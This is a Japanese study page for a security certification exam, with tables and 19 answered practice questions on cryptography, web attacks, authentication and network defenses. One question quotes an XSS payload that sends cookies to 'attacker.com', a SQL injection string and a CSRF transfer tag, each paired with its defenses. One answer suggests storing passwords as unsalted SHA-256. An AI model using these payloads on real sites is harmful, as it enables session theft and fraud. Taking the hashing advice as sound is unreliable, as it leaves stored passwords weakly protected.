| XSS | ブラウザ | エスケープ処理、CSP | 「他のユーザーが被害」 |
| CSRF | セッション | CSRF トークン | 「認証済みユーザーの権限を悪用」 |
| クリックジャッキング | 画面上の操作 | X-Frame-Options、frame-ancestors | 「iframe を重ねる」 |
| DDoS | サーバー可用性 | IPS、WAF、ロードバランサ | 「大量のリクエストで停止」 |
| フィッシング | ユーザー | メール認証、ユーザー教育 | 「偽サイトに誘導」 |
| ランサムウェア | ファイル | バックアップ、EDR | 「データを暗号化して身代金要求」 |
視点 5:「対策技術の層」で分類
| レイヤー | 対策技術 | 例 |
|---|---|---|
| ネットワーク層 | ファイアウォール、IDS/IPS | 不正パケットをブロック |
| アプリケーション層 | WAF | SQL インジェクション、XSS をブロック |
| エンドポイント層 | EPP、EDR、アンチウイルス | PC 上の侵入予防や不正活動の検知 |
| データ保護層 | DLP | 機密情報の持出しを抑止 |
| 全体監視 | SIEM | 複数システムのログを統合分析 |
問題で「どのレイヤーで防ぐべきか」と問われたら、上記の表で該当技術を見つけてください。
視点 5.5:「VPN の種類とテレワーク方式」が問われたら
| 問い方 | 中心になる語 | 切り分けのコツ |
|---|---|---|
| 拠点同士のネットワーク接続 | IPsec VPN / IP-VPN | ルータ や 閉域網 が合図 |
| 個人の在宅勤務接続 | SSL VPN | ブラウザ、外出先、個人端末 が合図 |
| 安全な通路を作る話 | VPN | 通信路の保護を聞いている |
| 遠隔側のデスクトップを操作する話 | 仮想デスクトップ方式 | 作業環境の置き場所を聞いている |
VPN は通信を守る技術で、仮想デスクトップ は作業環境の配置方法です。VPN を使った仮想デスクトップ もあり得るため、二者択一で考えないのがコツです。
視点 6:「従来型防御 vs ゼロトラスト」
| 観点 | 従来型防御 | ゼロトラスト |
|---|---|---|
| 適用場面 | ローカルネットワーク、社内 VPN | テレワーク、クラウド活用 |
| 認証のタイミング | ネットワーク進入時のみ | アクセスのたびに毎回 |
| 信頼の前提 | 社内は信頼 | 何も信頼しない |
| 対象 | ネットワーク境界 | ユーザー、デバイス、データ |
問題で「テレワーク多用」「クラウド」とあれば、ゼロトラストが答えの可能性が高いです。
確認問題
確認問題 1:鍵の個数計算
ある企業が 5 支社で情報共有システムを構築します。支社間通信の暗号化について、次の 2 つのシナリオで必要な鍵の本数(個数)を計算してください。
(1)各支社が共通鍵暗号で 1 対 1 に安全に通信する場合、必要な鍵は何本か。
(2)各支社が公開鍵暗号を使用する場合、必要な鍵(公開鍵 + 秘密鍵)は何個か。
(3)共通鍵の鍵配送問題とは何か、簡潔に説明してください。
解答例
(1)共通鍵暗号:各ペアに異なる鍵が必要
- ペアの数 = C(5,2) = 5 × 4 ÷ 2 = 10 本
- なぜなら、A-B、A-C、A-D、A-E、B-C、B-D、B-E、C-D、C-E、D-E のそれぞれに異なる秘密鍵が必要
- A と B の鍵を C とは共有できない(共有したら C がいつでも A-B の通信を盗聴可能)
(2)公開鍵暗号:各支社が公開鍵 1 つ + 秘密鍵 1 つ
- 鍵の個数 = 2 × 5 = 10 個
- 支社数に関わらず、全支社が全支社と安全に通信できる
- A-B 間、A-C 間、B-C 間など、すべて B の公開鍵(または C の公開鍵)で通信可能
(3)鍵配送問題
- 共通鍵暗号では、秘密鍵を事前に「安全に」交換する必要がある
- しかし、インターネットを経由して鍵を送ると、通信中に盗聴される可能性がある
- 物理的に渡す方法もあるが、支社が増えると管理が複雑になる
- ⇒ これが「鍵配送問題」
確認問題 2:暗号化とハッシュ関数の使い分け
次の 4 つのシナリオで、「暗号化」「ハッシュ関数」のどちらを使用すべきか、理由とともに答えてください。
(A)メールの内容を他人が読めないようにしたい
(B)ダウンロード前後でファイルが改ざんされていないか確認したい
(C)ユーザーのパスワードをデータベースに保存したい
(D)2 つのファイルが同じ内容であることを高速に確認したい
解答例
(A)暗号化を使用
- 理由:メール内容を秘密にする必要がある(機密性)
- 受信者が復号化して元の内容を読む必要がある
(B)ハッシュ関数を使用
- 理由:改ざん検知が目的(完全性確認)
- ハッシュ値を比較するだけで十分。復号化の必要なし
(C)ハッシュ関数を使用
- 理由:ハッキングされても元のパスワードを復元されない(一方向だから)
SHA-256(ユーザー入力)をデータベースに保存- ログイン時:入力値をハッシュ化して、保存値と比較
(D)ハッシュ関数を使用
- 理由:高速(暗号化より計算量が少ない)
- ハッシュ値が異なれば、ファイルが異なることが確実
確認問題 3:デジタル署名の 5 ステップ
A さんが B さんに重要なドキュメントを送信し、そのドキュメントが A さんから送られたこと(真正性)と改ざんされていないこと(完全性)を証明したいとします。デジタル署名の 5 つのステップを述べ、各ステップで使用する鍵と、その鍵を持っているのが誰かを明記してください。
解答例
| ステップ | 操作 | 使用する鍵 | 鍵の所有者 | 説明 |
|---|---|---|---|---|
| 1 | ドキュメント → ハッシュ関数 | なし | なし | ドキュメント全体を要約(固定長) |
| 2 | ハッシュ値 → 秘密鍵で暗号化 | A の秘密鍵 | A 本人 | デジタル署名を生成 |
| 3 | ドキュメント + 署名を送信 | なし | なし | B に到達 |
| 4 | 受信ドキュメント → ハッシュ関数 | なし | なし | 新しいハッシュ値を生成 |
| 5 | 署名 → A の公開鍵で復号化 | A の公開鍵 | 世界中に公開 | 復号化値と手順 4 のハッシュ値を比較 |
検証結果
- ハッシュ値が一致 → 署名は有効(A が確かに署名した、改ざんなし)
- ハッシュ値が異なる → 署名無効(改ざんされた、または A が署名していない)
確認問題 4:Web 攻撃の判定と防御策
次の 3 つのシナリオで、(1)どの Web 攻撃か、(2)攻撃対象は何か、(3)有効な防御策は何かを答えてください。
(A)会員サイトのコメント欄に以下が投稿される:<script>window.location='https://attacker.com?cookie='+document.cookie</script>
(B)ショッピングサイトの検索欄に ' OR '1'='1 が入力されると、全商品の情報が表示される
(C)ユーザーが銀行サイトで認証済みの状態で、別タブで攻撃者サイトを訪問。そのサイトに <img src="https://bank.com/transfer?to=attacker&amount=1000000"> が埋め込まれており、自動的に送金される
解答例
(A)XSS(クロスサイトスクリプティング)
- 攻撃対象:他のユーザーのブラウザ
- 仕組み:スクリプトがブラウザで実行され、Cookie(セッションID)が盗まれる
- 防御策:出力時のエスケープ処理、Content-Security-Policy ヘッダ設定、入力値検証
(B)SQL インジェクション
- 攻撃対象:サーバー側のデータベース
- 仕組み:
SELECT * FROM products WHERE name='' OR '1'='1'となり、WHERE 条件が常に真になる - 防御策:プリペアドステートメント、入力値検証・サニタイズ
(C)CSRF(クロスサイトリクエストフォージェリ)
- 攻撃対象:認証済みユーザーのセッション
- 仕組み:ユーザーが認証済み状態で、別サイトから自動的にリクエストが送信される(Cookie は自動送信される)
- 防御策:CSRF トークン検証、SameSite クッキー属性設定
確認問題 5:IDS・IPS・ファイアウォール・WAF の役割
次の 4 つのセキュリティ対策について、(1)どこに配置されるか、(2)何を防ぐのか、(3)どのレイヤーで動くのかを答えてください。
(A)ファイアウォール
(B)IDS(侵入検知システム)
(C)IPS(侵入防止システム)
(D)WAF(Web Application Firewall)
解答例
| 技術 | 配置場所 | 役割 | 防ぐもの | レイヤー |
|---|---|---|---|---|
| ファイアウォール | ネットワーク境界(最外側) | パケットの出入りを制御、ポート制限 | 不正な接続、許可されていないポート | ネットワーク層(L3-L4) |
| IDS | ネットワーク内 | 不正なトラフィックを検知(検知のみ) | 既知の攻撃パターン | ネットワーク層(L3-L4) |
| IPS | ネットワーク内 | 不正なトラフィックを検知して自動ブロック | 既知の攻撃パターン | ネットワーク層(L3-L4) |
| WAF | Web サーバー前面 | HTTP/HTTPS の攻撃を検知・ブロック | SQL インジェクション、XSS、CSRF など | アプリケーション層(L7) |
防ぐことができない例
- ファイアウォール:HTTP ポート 80 を開いていれば、その後ろの SQL インジェクションは通す
- IDS/IPS:内部ネットワークの脅威(感染した社員 PC)は対象外
- WAF:ネットワークレベルの DDoS 攻撃は対象外
確認問題 6:電子署名 / 電子証明書 / 認証局 / PKI の判定
次の説明に最も適切な語を答えてください。
(A)「この公開鍵は確かに A 社のものです」と第三者が証明したデータ
(B)その証明を発行し、失効管理も行う第三者機関
(C)文書の作成者本人性と改ざん有無を確認するため、ハッシュ値に秘密鍵を用いて付与するもの
(D)上記の仕組み全体を支える公開鍵の信頼基盤
解答例
- (A)電子証明書
- (B)認証局(CA)
- (C)電子署名
- (D)PKI(公開鍵基盤)
確認問題 7:認証方式の切り分け
次の状況で、最も中心になる認証方式を答えてください。
(A)ログインのたびに、アプリに表示される 6 桁の数字が変わる
(B)サーバが乱数を送り、利用者側は秘密情報から計算した値だけを返すので、パスワードそのものは送らない
(C)普段使わない国や端末からのアクセス時だけ、追加でコード入力を求める
(D)一度社内ポータルで認証すると、会計システムや勤怠システムに再ログインせず入れる
解答例
- (A)ワンタイムパスワード(OTP)
- (B)チャレンジレスポンス認証
- (C)リスクベース認証
- (D)シングルサインオン(SSO)
確認問題 8:認証連携技術の役割分担
次の説明に最も適切な語を答えてください。
(A)ユーザー ID、所属、メールアドレスなどを階層構造で管理する仕組み
(B)無線 LAN や VPN で、アクセスサーバから送られた認証要求を受けて判定するプロトコル
(C)チケットを用いて、パスワードを都度送らずに本人確認を行う方式
(D)他サービスに対して、利用者の権限の範囲だけを委ねる仕組み
(E)OAuth 2.0 に本人確認の仕組みを加えた、モダンなログイン連携方式
解答例
- (A)LDAP
- (B)RADIUS
- (C)Kerberos
- (D)OAuth 2.0
- (E)OpenID Connect
確認問題 9:端末管理とゼロトラストの判断
次の状況で、最も適切な組み合わせや考え方を答えてください。
(A)社員の私物スマホで業務メールを使うが、業務文書だけは持出し制御したい
(B)会社支給スマホを一括配布し、紛失時には遠隔ワイプしたい
(C)テレワーク環境で、社内外を区別せず、アクセスのたびにユーザーと端末の状態を確認したい
(D)一度の認証で勤怠、経費、会計システムに順次入れるようにしたい
解答例
- (A)BYOD + MCM
- (B)COPE + MDM
- (C)ゼロトラスト
- (D)SSO
解説
- A:私物端末の利用方針は BYOD、業務文書単位の統制は MCM が中心です。
- B:会社端末を配り、端末全体を制御するので COPE と MDM の組み合わせが自然です。
- C:
毎回検証、社内外を前提にしないはゼロトラストの合図です。 - D:認証強化ではなく、認証結果を複数システムで使い回す利便性の話なので SSO です。
確認問題 10:パスキー / OTP / SSO の切り分け
次の状況で、最も中心になる方式を答えてください。
(A)スマートフォンやPCに保存された認証情報を使い、パスワードを入力せずにログインする
(B)ログイン時に、認証アプリが表示した6桁コードを追加で入力する
(C)社内ポータルで一度認証すると、会計・勤怠・経費システムに再入力なしで入れる
解答例
- (A)パスキー
- (B)ワンタイムパスワード(OTP)
- (C)シングルサインオン(SSO)
確認問題 11:タイムスタンプ / CRL / OCSP の役割
次の説明に最も適切な語を答えてください。
(A)電子文書がその時刻に存在し、その後改ざんされていないことを示す仕組み
(B)失効した証明書の一覧をまとめて配布し、照合に使う仕組み
(C)特定の証明書が今も有効かどうかを、その場で問い合わせて確認する仕組み
解答例
- (A)タイムスタンプ
- (B)CRL
- (C)OCSP
確認問題 12:リスク対応 4 類型の判定
次の対策を、回避、低減、移転、受容 のいずれに分類してください。
- 高リスクの外部公開機能そのものを廃止する
- 多要素認証と教育により情報漏えいの発生確率を下げる
- サイバー保険に加入して経済的損失に備える
- 影響が軽微でコストに見合わないため、監視だけして受け入れる
解答
1 → 回避 2 → 低減 3 → 移転 4 → 受容
解説
- 1番:リスク源自体をなくしているので回避です。
- 2番:確率や影響を下げる対策なので低減です。
- 3番:損失負担の一部を保険会社へ移すので移転です。
- 4番:分析したうえで意識的に受け入れるので受容です。
確認問題 13:WAF / CSP / SameSite の切り分け
次の状況で、最も中心になる技術を答えてください。
(A)Web サーバーの手前で、不審な HTTP リクエストを遮断したい
(B)ブラウザに対して、信頼した出所の JavaScript だけを実行させたい
(C)別サイトからのリクエストでは、認証用 Cookie を送りにくくしたい
解答例
- (A)WAF
- (B)CSP
- (C)SameSite
解説
- A:サーバー前面でリクエストを検査するので WAF です。
- B:ブラウザ内での読み込み元制御なので CSP です。
- C:Cookie の送信条件を制御するので SameSite です。
確認問題 14:IDS / IPS / EDR / SIEM の役割分担
次の説明に最も適切な語を答えてください。
(A)ネットワーク通信を見て、不審なパターンを検知したら管理者へ通知する
(B)ネットワーク通信を見て、不審な通信を自動的に遮断する
(C)PC やサーバ上の不審プロセスや外部通信を監視し、隔離などの初動対応を行う
(D)複数機器からログを集め、相関分析で全体の異常を見つける
解答例
- (A)IDS
- (B)IPS
- (C)EDR
- (D)SIEM
解説
- A / B:どちらもネットワーク監視ですが、
通知だけなら IDS、遮断までなら IPS です。 - C:端末内の挙動を見るので EDR です。
- D:ログ集約と相関分析が中心なので SIEM です。
確認問題 15:VPN 種別とテレワーク方式の判断
次の状況で、最も中心になる方式を答えてください。
(A)本社と支社のルータ同士を、インターネット上で暗号化して常時接続したい
(B)社員が自宅の PC から、ブラウザ経由で社内システムへ安全に入りたい
(C)通信事業者が提供する閉域網で、複数拠点を結びたい
(D)手元の PC では画面だけを表示し、実際の処理とデータは社内側の仮想デスクトップに置きたい
解答例
- (A)IPsec VPN
- (B)SSL VPN
- (C)IP-VPN
- (D)仮想デスクトップ方式
解説
- A:拠点やルータ同士の暗号化トンネルなので IPsec VPN です。
- B:個人端末のリモートアクセスなので SSL VPN が自然です。
- C:閉域網サービスなので IP-VPN です。
- D:通信路よりも作業環境の配置が中心なので、仮想デスクトップ方式です。
確認問題 16:クリックジャッキングと X-Frame-Options の切り分け
次の状況で、最も中心になる攻撃または対策を答えてください。
(A)攻撃者が透明な iframe を重ね、利用者に別のボタンを押させて送金操作を実行させる
(B)自社の画面を他サイトの frame や iframe に埋め込ませないようにしたい
(C)他サイトに埋め込まれたページで、どのサイトからの埋め込みを許すかを細かく制御したい
解答例
- (A)クリックジャッキング
- (B)X-Frame-Options
- (C)CSP の
frame-ancestors
解説
- A:画面の重ね合わせで誤クリックを誘うのでクリックジャッキングです。
- B:
DENYやSAMEORIGINで埋め込みを防ぐ代表的なヘッダです。 - C:より細かい埋め込み元制御なら CSP の
frame-ancestorsを使います。
確認問題 17:EPP / EDR / DLP の役割分担
次の状況で、最も中心になる技術を答えてください。
(A)既知マルウェアの実行をシグネチャで事前にブロックしたい
(B)端末感染後の不審プロセスや外部通信を監視し、隔離まで行いたい
(C)個人情報ファイルをメール添付や USB 持ち出しで外へ出さないようにしたい
解答例
- (A)EPP
- (B)EDR
- (C)DLP
解説
- A:侵入前の予防が中心なので EPP です。
- B:侵入後の挙動監視と対応なので EDR です。
- C:情報の持出し経路を制御するので DLP です。
確認問題 18:テレワーク方式の分類
次の状況で、最も中心になる方式を答えてください。
(A)社員の私物スマホに業務専用の隔離領域を作り、その中だけでメールと文書閲覧を許可する
(B)自宅 PC から、会社に置いた PC の画面を遠隔操作して業務を行う
(C)自宅 PC から、VDI 基盤上の仮想デスクトップへ接続して作業する
(D)特殊なブラウザ経由で Web アプリ中心の業務を行い、端末側への保存を抑えたい
(E)社内ネットワークを経由せず、SaaS へ直接アクセスして業務を完結させたい
解答例
- (A)セキュアコンテナ方式
- (B)リモートデスクトップ方式
- (C)仮想デスクトップ方式
- (D)セキュアブラウザ方式
- (E)クラウドサービス方式
解説
- A:端末内に業務専用の箱を作るのでセキュアコンテナ方式です。
- B:オフィス設置 PC の画面を触るのでリモートデスクトップ方式です。
- C:VDI 基盤上の環境を遠隔操作するので仮想デスクトップ方式です。
- D:特殊ブラウザ経由で使うのでセキュアブラウザ方式です。
- E:最初からクラウドへ直接入るのでクラウドサービス方式です。
確認問題 19:共通鍵方式と公開鍵方式の主語を追う
次の説明のうち、正しいものを答えてください。
(A)B さんが A さんへ顧客名簿を送りたい。B さんが任意に決めた 1 つの鍵で暗号化し、その同じ鍵を別経路で A さんへ伝えて復号してもらう。これは共通鍵方式の説明として読める
(B)B さんが A さんの公開鍵で暗号化し、B さんの秘密鍵で復号する。これは公開鍵方式の説明として正しい
(C)B さんが A さんの公開鍵で暗号化し、A さんの秘密鍵で復号する。これは公開鍵方式の説明として正しい
解答例
- (A)正しい
- (B)誤り
- (C)正しい
解説
- A:暗号化と復号で
同じ鍵を使うので、方式としては共通鍵方式です。安全な鍵配送かどうかは別論点ですが、方式の説明としては読めます。 - B:受信者 A さんの公開鍵で暗号化したなら、復号できるのは A さんの秘密鍵です。送信者 B さんの秘密鍵では復号できません。
- C:
受信者の公開鍵で暗号化し、受信者の秘密鍵で復号するが公開鍵暗号の基本です。
ポイント
- 秘密メッセージを送るときは、
誰が読みたいのかを基準に鍵を追います。 - 署名の問題と混ざったら、
暗号化は受信者側の鍵、署名は送信者側の鍵に戻って整理してください。
関連ページ
このページは役に立ちましたか?
評価とひとことを残してもらえると、内容と導線の改善に使えます。
Last updated on